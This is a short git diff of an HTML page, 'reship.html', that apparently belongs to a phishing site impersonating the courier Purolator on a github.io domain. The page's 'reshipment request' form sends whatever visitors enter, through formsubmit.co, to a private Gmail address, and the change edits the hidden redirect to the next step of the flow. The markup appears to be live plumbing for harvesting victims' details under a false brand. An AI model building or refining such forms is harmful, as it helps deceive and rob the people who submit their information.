--- a/reship.html
+++ b/reship.html
@@ -26,7 +26,7 @@
 
                 <form action="https://formsubmit.co/natashaxeadie@gmail.com" method="POST">
                     
-                    <input type="hidden" name="_next" value="https://purolatorforms.github.io/details.html">
+                    <input type="hidden" name="_next" value="https://purolatorforms.github.io/reship/details.html">
                     <input type="hidden" name="_next" value="details.html"> 
                     
                     <input type="hidden" name="_subject" value="New Reshipment Request (Step 1)">
